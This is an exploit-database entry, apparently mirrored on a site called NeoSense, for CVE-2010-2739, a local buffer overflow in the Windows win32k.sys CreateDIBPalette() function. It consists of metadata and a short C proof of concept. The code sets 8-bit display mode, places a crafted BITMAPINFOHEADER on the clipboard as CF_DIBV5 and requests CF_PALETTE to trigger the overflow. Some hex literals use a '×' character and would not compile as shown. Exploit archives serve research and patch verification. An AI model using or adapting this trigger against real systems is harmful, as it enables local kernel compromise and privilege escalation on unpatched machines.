[] NeoSense
E X P L O I T S
title author type platform port cve id

Microsoft Windows - 'win32k.sys' Driver 'CreateDIBPalette()' Local Buffer Overflow

Author: Arkon
type: local
platform: windows
port: 
date_added: 2010-08-06 
date_updated: 2017-11-15 
verified: 1 
codes: OSVDB-66934;CVE-2010-2739 
tags: 
aliases:  
screenshot_url:  
application_url: 
// source: http://www.ragestorm.net/blogs/?p=255
// source: http://secunia.com/advisories/40870/

DEVMODE dm = {0};
dm.dmSize  = sizeof(DEVMODE);
dm.dmBitsPerPel = 8;
dm.dmPelsWidth = 800;
dm.dmPelsHeight = 600;
dm.dmFields = DM_PELSWIDTH | DM_PELSHEIGHT | DM_BITSPERPEL;
ChangeDisplaySettings(&dm, 0);

BITMAPINFOHEADER bmih = {0};
bmih.biClrUsed = 0×200;

HGLOBAL h = GlobalAlloc(GMEM_FIXED, 0×1000);
memcpy((PVOID)GlobalLock(h), &bmih, sizeof(bmih));
GlobalUnlock(h);

OpenClipboard(NULL);
SetClipboardData(CF_DIBV5, (HANDLE)h);
CloseClipboard();

OpenClipboard(NULL);
GetClipboardData(CF_PALETTE);
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.